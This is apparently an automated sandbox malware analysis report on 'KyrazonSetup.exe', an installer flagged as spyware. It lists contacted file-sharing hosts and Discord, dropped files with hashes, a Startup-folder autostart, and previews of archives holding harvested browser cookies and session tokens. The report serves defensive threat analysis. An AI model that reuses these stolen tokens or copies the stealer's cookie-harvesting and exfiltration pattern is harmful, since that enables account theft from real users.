https://github.com/chalk/wrap-ansi?sponsor=10%Avira URL Cloudsafe
https://github.com/LiosK/UUID.js0%Avira URL Cloudsafe
https://github.com/KhronosGroup/Vulkan-Loader0%Avira URL Cloudsafe
https://github.com/uuidjs/uuid/pull/677#issuecomment-17573513510%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=ar&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
https://github.com/SeleniumHQ/selenium/tree/trunk0%Avira URL Cloudsafe
https://gitlab.freedesktop.org/xdg/xdgmime0%Avira URL Cloudsafe
http://www.strongtalk.org/0%Avira URL Cloudsafe
https://github.com/blueimp/JavaScript-MD50%Avira URL Cloudsafe
http://source.android.com/0%Avira URL Cloudsafe
http://cldr.unicode.org/index/downloads0%Avira URL Cloudsafe
https://github.com/google/ruy0%Avira URL Cloudsafe
https://github.com/google/shell-encryption0%Avira URL Cloudsafe
https://polymer-library.polymer-project.org0%Avira URL Cloudsafe
https://github.com/tensorflow/text.git0%Avira URL Cloudsafe
https://github.com/npm/wrappy0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | unknown
file.io | 45.55.107.24 | true | false | | unknown
discord.com | 162.159.135.232 | true | false | | unknown
oshi.at | 194.15.112.248 | true | false | | unknown
tempfile.me | 193.37.215.73 | true | false | | unknown
api.gofile.io | 51.38.43.18 | true | false | | unknown
zerostone.discloud.app | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://92.246.138.20/storage | false | Avira URL Cloud: safe | unknown
                • Avira URL Cloud: safe
                unknown
                https://opensource.org/licenses/MITKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://cldr.unicode.org/index/downloadsKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://source.android.com/KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://github.com/tensorflow/text.gitKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://github.com/google/ruyKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://polymer-library.polymer-project.orgKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://github.com/google/shell-encryptionKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://github.com/npm/wrappyKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                194.15.112.248 | oshi.at | Ukraine | 213354 | INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB | false
                162.159.61.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                193.37.215.73 | tempfile.me | Bulgaria | 44901 | BELCLOUDBG | false
                92.246.138.20 | unknown | Russian Federation | 8744 | MEGAMAX-ASNizhnyNovgorodRU | false
                45.55.107.24 | file.io | United States | 14061 | DIGITALOCEAN-ASNUS | false
                162.159.135.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
                172.64.41.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
                51.38.43.18 | api.gofile.io | France | 16276 | OVHFR | false
                Joe Sandbox version: 40.0.0 Tourmaline
                Analysis ID: 1489101
                Start date and time: 2024-08-06 23:53:12 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 11m 13s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed: 208
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: KyrazonSetup.exe
                Detection: MAL
                Classification: mal60.spyw.winEXE@294/101@10/8
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 46
                • Number of non-executed functions: 43
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 52.165.165.26, 93.184.221.240, 20.242.39.171, 13.85.23.206, 52.165.164.15, 13.95.31.18
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                • VT rate limit hit for: KyrazonSetup.exe
                Time | Type | Description
                17:54:11 | API Interceptor | 11x Sleep call for process: KyrazonSetup.exe modified
                22:54:31 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):172671488
                                                                                    Entropy (8bit):6.736653382610154
                                                                                    Encrypted:false
                                                                                    SSDEEP:1572864:q3lB0RhDP7igv6wO+HkaN/xtpj56BZWua2T3jC0gqhd07YeRt6C1Bd1jKoUeKtQk:/Pvt1x2z5m1ij
                                                                                    MD5:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    SHA1:09AEDF44E30437BE57326C61570BE52930B0F001
                                                                                    SHA-256:BD4E25E01DE9EC86B4B55BDE68A59F196BA4AD2F0889F3CAF761A6D548027DD5
                                                                                    SHA-512:566F12212B7A3CA1AD1184BD0CB6DF9552A4600BE36FA0C9632681A68C6FEA20068A09E160C404AB31468448DB10308E6B2C3424515F02E5C25EC7BF2F250F02
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):135642
                                                                                    Entropy (8bit):7.916363227461705
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:tezwJCGIekwf9W2bg3yhPaL2o418Gb0+VRLf0ld0GY3cQ3ERVm2I:tezw1Iek+42k3yMK18Gb0OV8ld0GecQJ
                                                                                    MD5:A0E681FDD4613E0FFF6FB8BF33A00EF1
                                                                                    SHA1:6789BACFE0B244AB6872BD3ACC1E92030276011E
                                                                                    SHA-256:86F6B8FFA8788603A433D425A4BC3C4031E5D394762FD53257B0D4B1CFB2FFA2
                                                                                    SHA-512:6F6A1A8BFE3D33F3FA5F6134DAC7CD8C017E38E5E2A75A93A958ADDBB17A601C5707D99A2AF67E52C0A3D5206142209703701CD3FAB44E0323A4553CAEE86196
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):195396
                                                                                    Entropy (8bit):7.94178165609805
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:ADQYaE/N6Mrvy/3JP29W2bg3yhPaafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+y:ADQYaSN6svyd242k3yxgx5GMRejnbdZR
                                                                                    MD5:C37BD7A6B677A37313B7ECC4FF01B6F5
                                                                                    SHA1:79DB970C44347BD3566CEFB6CABD1995E8E173DF
                                                                                    SHA-256:8C1AE81D19FD6323A02EB460E075E2F25ABA322BC7D46F2E6EDB1C4600E6537A
                                                                                    SHA-512:A7B07133FA05593B102A0E5E5788B29488CB74656C5EE25DE897C2BA2B2A7B05C0663ADE74A003F7D6DF2134D0B75F0AD25E15E9C9E0969E9453B7FC40B9F8BB
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4916712
                                                                                    Entropy (8bit):6.398049523846958
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                    MD5:2191E768CC2E19009DAD20DC999135A3
                                                                                    SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                    SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                    SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                    • Filename: UnifyX64.exe, Detection: malicious, Browse
                                                                                    • Filename: UnifyX64.exe, Detection: malicious, Browse
                                                                                    • Filename: WorldWars.exe, Detection: malicious, Browse
                                                                                    • Filename: WorldWars.exe, Detection: malicious, Browse
                                                                                    • Filename: TamenuV11.msi, Detection: malicious, Browse
                                                                                    • Filename: TamenuV5.2.exe, Detection: malicious, Browse
                                                                                    • Filename: TamenuV5.2.exe, Detection: malicious, Browse
                                                                                    • Filename: LisectAVT_2403002A_375.exe, Detection: malicious, Browse
                                                                                    • Filename: Setup 3.0.0.msi, Detection: malicious, Browse
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2887680
                                                                                    Entropy (8bit):6.7090688959107
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:9F5qb84KtStWEK/Ju2lf3tAtiLHQVTf6yfcrhCHDXLl8+0LKSQUSCu:9FvSkJXv+tiLAD0+DUS5
                                                                                    MD5:208E7AF956A0803900125BDC11A3ECF2
                                                                                    SHA1:1BD84174194485DA634BF8B3AF0A78E236316A8E
                                                                                    SHA-256:D863C8A26744703F2D12C674B45C87D8B34E21EFCE169D4797B57964D168B077
                                                                                    SHA-512:76937999A21391107D9EBCFD66C7A2CA967CC7CAC7AEB2B15BBECA6B546423A3D5C83969EF151C95D916D5A9F653573CD59D05110566D52A5C2679059C4D4EC3
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):10717392
                                                                                    Entropy (8bit):6.282534560973548
                                                                                    Encrypted:false
                                                                                    SSDEEP:196608:hpgPBhORiuQwCliXUxbblHa93Whli6Z86WOH:n8wkDliXUxbblHa93Whli6Z8I
                                                                                    MD5:E0F1AD85C0933ECCE2E003A2C59AE726
                                                                                    SHA1:A8539FC5A233558EDFA264A34F7AF6187C3F0D4F
                                                                                    SHA-256:F5170AA2B388D23BEBF98784DD488A9BCB741470384A6A9A8D7A2638D768DEFB
                                                                                    SHA-512:714ED5AE44DFA4812081B8DE42401197C235A4FA05206597F4C7B4170DD37E8360CC75D176399B735C9AEC200F5B7D5C81C07B9AB58CBCA8DC08861C6814FB28
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):140288
                                                                                    Entropy (8bit):6.055411992765344
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:94PTD6FEzMju6bzJKjpEPeTOKvJhEnww+YbRYvPuq:94jQju6b9KilKvJurR8W
                                                                                    MD5:04BFBFEC8DB966420FE4C7B85EBB506A
                                                                                    SHA1:939BB742A354A92E1DCD3661A62D69E48030A335
                                                                                    SHA-256:DA2172CE055FA47D6A0EA1C90654F530ABED33F69A74D52FAB06C4C7653B48FD
                                                                                    SHA-512:4EA97A9A120ED5BEE8638E0A69561C2159FC3769062D7102167B0E92B4F1A5C002A761BD104282425F6CEE8D0E39DBE7E12AD4E4A38570C3F90F31B65072DD65
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):140288
                                                                                    Entropy (8bit):6.055411992765344
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:94PTD6FEzMju6bzJKjpEPeTOKvJhEnww+YbRYvPuq:94jQju6b9KilKvJurR8W
                                                                                    MD5:04BFBFEC8DB966420FE4C7B85EBB506A
                                                                                    SHA1:939BB742A354A92E1DCD3661A62D69E48030A335
                                                                                    SHA-256:DA2172CE055FA47D6A0EA1C90654F530ABED33F69A74D52FAB06C4C7653B48FD
                                                                                    SHA-512:4EA97A9A120ED5BEE8638E0A69561C2159FC3769062D7102167B0E92B4F1A5C002A761BD104282425F6CEE8D0E39DBE7E12AD4E4A38570C3F90F31B65072DD65
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1892864
                                                                                    Entropy (8bit):6.574510854408502
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:lVtIA1xRrGLYLn9M+BMPPivsICK9rzoNEqt:7tH4X3inMZt
                                                                                    MD5:66A65322C9D362A23CF3D3F7735D5430
                                                                                    SHA1:ED59F3E4B0B16B759B866EF7293D26A1512B952E
                                                                                    SHA-256:F806F89DC41DDE00CA7124DC1E649BDC9B08FF2EFF5C891B764F3E5AEFA9548C
                                                                                    SHA-512:0A44D12852FC4C74658A49F886C4BC7C715C48A7CB5A3DCF40C9F1D305CA991DD2C2CB3D0B5FD070B307A8F331938C5213188CBB2D27D47737CC1C4F34A1EA21
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:modified
                                                                                    Size (bytes):2688
                                                                                    Entropy (8bit):6.985395041051352
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:9NPOFmFnZYpjng0tOeS+c8Su2+2Y9JbwXn2PFv9ulOKwLKgpucbmOLoKWCyuc2:mFm3YtOeSPuiEWGtv9emKmu88VHu7
                                                                                    MD5:EFE25E25C2FBCF1B9FABAA03C23F798F
                                                                                    SHA1:B073FC9EAF465FCB7EC462D5E0DD00D7BB8E3B00
                                                                                    SHA-256:C57E3652F52D359DE134C9E0A00666DF7EAA0D81BCF729F58E5FAEA786AB28DD
                                                                                    SHA-512:5E776E52178FDB906EB0003D757546AE2CA71B92335BC905B080A5A2014162C5E3A6760F1B49C7AD5EA3958FD984755E8A82D70EDF638BF8E26742212B7B4724
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:ASCII text, with very long lines (522)
                                                                                    Category:dropped
                                                                                    Size (bytes):3308
                                                                                    Entropy (8bit):5.836762246327351
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:7TJfocO2joccRhocZ8bJocofo3owoUv3uoNoWbooBoIo1Xp6oNsADoqwPoAcvsA9:Bj0RT2gJ
                                                                                    MD5:9CA2464D1CCB91DE27CE8CCB2A71226B
                                                                                    SHA1:B3105F3090B0783517A670F5A7200044E04BE8B1
                                                                                    SHA-256:4740FCC5D200692A093002F2B530CFA4C44508E10454CEFC494682D9A57EB8B8
                                                                                    SHA-512:9AAE4D487F3F4CB7E295A5A5EFE906FF977F3338D95D4797535EB05733B98EC46FE0A9A84859ADC06E4711EDD20FA9442E927D93616F98BA2541170D42BF18E6
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1892864
                                                                                    Entropy (8bit):6.574510854408502
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:lVtIA1xRrGLYLn9M+BMPPivsICK9rzoNEqt:7tH4X3inMZt
                                                                                    MD5:66A65322C9D362A23CF3D3F7735D5430
                                                                                    SHA1:ED59F3E4B0B16B759B866EF7293D26A1512B952E
                                                                                    SHA-256:F806F89DC41DDE00CA7124DC1E649BDC9B08FF2EFF5C891B764F3E5AEFA9548C
                                                                                    SHA-512:0A44D12852FC4C74658A49F886C4BC7C715C48A7CB5A3DCF40C9F1D305CA991DD2C2CB3D0B5FD070B307A8F331938C5213188CBB2D27D47737CC1C4F34A1EA21
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... ...!... ...!D.. ...!... ..!... ..!... ..!... ...!... ... ... .U.!... .U.!... .U. ... .U.!... Rich... ........PE..d...&..e.........." ...%.....6......,........................................@............`.........................................py.......y..(...............\............ ..4.......p...............................@...................\n..@....................text............................... ..`.rdata..^...........................@..@.data... f.......P...|..............@....pdata..\...........................@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:modified
                                                                                    Size (bytes):2688
                                                                                    Entropy (8bit):6.981542781401866
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:95zOFmFnZYpjng0tOeS+c8Su2+2Y9JbwXn2PFv9ulOKFwiuc3iOhMWruc+:OFm3YtOeSPuiEWGtv9eIiu0Rruz
                                                                                    MD5:9019FE74E4037041E9C6CAD35CE7B8B3
                                                                                    SHA1:C3B95832C44F033D3ABCBF10626C7F6E677428D9
                                                                                    SHA-256:98CCE0A362A87507BCB25BD7970301FD426B87A1C4585FF69992C67F56D638DB
                                                                                    SHA-512:C0E1DF4AD0C1C77E84A687CAD22B2BA4692CF2E142A6F333AEFB0D51C0ED848F4866279E3A9BE560D6618D232B4239AC891A19112978DB5DC8317B46563D4795
                                                                                    Malicious:false
                                                                                    Preview:PK..........Y................Applications\PK..........Y................Browser Extensions\PK..........Y................Cookies\PK..........Yq..-............Cookies\Google_Default.txt...H....9..*.2!Y.....|...'6....Z...}Z.3....bX ..........\...u9.x[u.1.D.Wg.e...`x....x.6....3....C.........=...0...Bqus......u.#GCg."(_...1..&7..&...l.y....Z....M..8G..Z. ..(^C.T..-....bW.#.r..9....6..3...s..G..m.1.U.._....2........}.&.\w.].......D.......|u........:..5.......C....w{v'.*<..u.]...??.nHe..H<...*~..(K.J../.-.U..q..6/../q^+w..yR....Q.e.;9..L;...e..V.Mu..."*k....\..&ma.7..kh..8E.<N...kV..$....q...!7.m...../...K^.bE..u}/7{.q..p./K.`..?..D.D.....y...t.D'.oe....._Q.TQ....k.O.x.Wl..(.)...XW)M..p.....v.e'%e.^...Jy.$i..M..y.....cHS.r..!I(.QB1..........i.`.o...!..Y!F...p.X..c>......._.....}24.......0....8.X.....7..........c.F.D.....c......<[{....9..7%a...}<..'."P...H...1P4..".8 .?....<..[-.4.7.:.DW..../[.=..k9....U[2..'qy..gk.AW...2......".r./W.O.."v..q.K.t..9..
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:ASCII text, with very long lines (522)
                                                                                    Category:dropped
                                                                                    Size (bytes):3308
                                                                                    Entropy (8bit):5.836762246327351
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:7TJfocO2joccRhocZ8bJocofo3owoUv3uoNoWbooBoIo1Xp6oNsADoqwPoAcvsA9:Bj0RT2gJ
                                                                                    MD5:9CA2464D1CCB91DE27CE8CCB2A71226B
                                                                                    SHA1:B3105F3090B0783517A670F5A7200044E04BE8B1
                                                                                    SHA-256:4740FCC5D200692A093002F2B530CFA4C44508E10454CEFC494682D9A57EB8B8
                                                                                    SHA-512:9AAE4D487F3F4CB7E295A5A5EFE906FF977F3338D95D4797535EB05733B98EC46FE0A9A84859ADC06E4711EDD20FA9442E927D93616F98BA2541170D42BF18E6
                                                                                    Malicious:false
                                                                                    Preview:.google.com.TRUE./.FALSE.13355861278849698.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.AuthProvider.True.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N.support.office.com.TRUE./.FALSE.13355861278849698.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474..microsoft.com.TRUE./.FALSE.13355861278849698.MC1.GUID=749eee6039c5489b9db3000c7ab3f399&HASH=749e&LV=202310
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):172671488
                                                                                    Entropy (8bit):6.736653382610154
                                                                                    Encrypted:false
                                                                                    SSDEEP:1572864:q3lB0RhDP7igv6wO+HkaN/xtpj56BZWua2T3jC0gqhd07YeRt6C1Bd1jKoUeKtQk:/Pvt1x2z5m1ij
                                                                                    MD5:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    SHA1:09AEDF44E30437BE57326C61570BE52930B0F001
                                                                                    SHA-256:BD4E25E01DE9EC86B4B55BDE68A59F196BA4AD2F0889F3CAF761A6D548027DD5
                                                                                    SHA-512:566F12212B7A3CA1AD1184BD0CB6DF9552A4600BE36FA0C9632681A68C6FEA20068A09E160C404AB31468448DB10308E6B2C3424515F02E5C25EC7BF2F250F02
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........."......0o..f......p.j........@..........................................`.............................................9D......T....pw.....`2.0.D...........y..x...k.......................e..(....]o.@...........h...X...hr..`....................text...e/o......0o................. ..`.rdata..x.}..@o...~..4o.............@..@.data.....E..@.......4..............@....pdata..0.D..`2.. D..,..............@..@.00cfg..0.....v......L:.............@..@.gxfg... C....v..D...N:.............@..@.retplne......v.......:..................rodata.......v.......:............. ..`.tls..........w.......:.............@...CPADinfo8.... w.......:.............@...LZMADEC......0w.......:............. ..`_RDATA..\....Pw.......:.............@..@malloc_h.....`w.......:............. ..`.rsrc.......pw.......:.............@..@.reloc...x....y..z...H<.............@..B................
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1096
                                                                                    Entropy (8bit):5.13006727705212
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                    MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                    SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                    SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                    SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                    Malicious:false
                                                                                    Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:HTML document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):9227221
                                                                                    Entropy (8bit):4.785730097444693
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:cpD6826x5kSWSsRinoHnmfm646a6N6z68SH4SApTJ:cHSek
                                                                                    MD5:2675B30D524B6C79B6CEE41AF86FC619
                                                                                    SHA1:407716C1BB83C211BCB51EFBBCB6BF2EF1664E5B
                                                                                    SHA-256:6A717038F81271F62318212F00B1A2173B9CB0CC435F984710AC8355EB409081
                                                                                    SHA-512:3214341DA8BF3347A6874535BB0FF8D059EE604E779491780F2B29172F9963E23ACBE3C534D888F7A3B99274F46D0628962E1E72A5D3FC6F18CA2B62343DF485
                                                                                    Malicious:false
                                                                                    Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title">Credits</span>.<a id="print-link" href="#" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may use, copy, modify this code for any purpose
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):135642
                                                                                    Entropy (8bit):7.916363227461705
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:tezwJCGIekwf9W2bg3yhPaL2o418Gb0+VRLf0ld0GY3cQ3ERVm2I:tezw1Iek+42k3yMK18Gb0OV8ld0GecQJ
                                                                                    MD5:A0E681FDD4613E0FFF6FB8BF33A00EF1
                                                                                    SHA1:6789BACFE0B244AB6872BD3ACC1E92030276011E
